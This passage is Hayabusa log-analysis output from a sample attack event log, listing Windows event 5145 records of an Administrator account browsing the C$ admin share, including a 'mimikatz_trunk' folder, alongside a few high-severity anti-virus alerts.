0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Videos | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File 
Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recorded TV\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\mimikatz_trunk | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\mimikatz_trunk\Win32 | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\mimikatz_trunk\x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Downloads | 
IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Music\Sample Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Music\Sample Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.957 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Pictures\Sample Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Pictures\Sample Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Videos\Sample Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Videos\Sample Videos | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recorded TV | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recorded TV\Sample Media\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recorded TV\Sample Media | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$ | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share 
File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share 
File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
